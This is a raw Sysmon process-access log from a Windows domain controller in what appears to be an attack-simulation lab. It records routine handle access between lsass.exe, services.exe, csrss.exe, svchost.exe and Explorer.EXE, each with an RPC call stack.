13:58:19.602{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.602{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.508{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.508{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E44-6005-0A00-00000000A301}8485104C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.305{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.289{59A5CD1D-93FB-6005-FD04-00000000A301}11563500C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.274{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 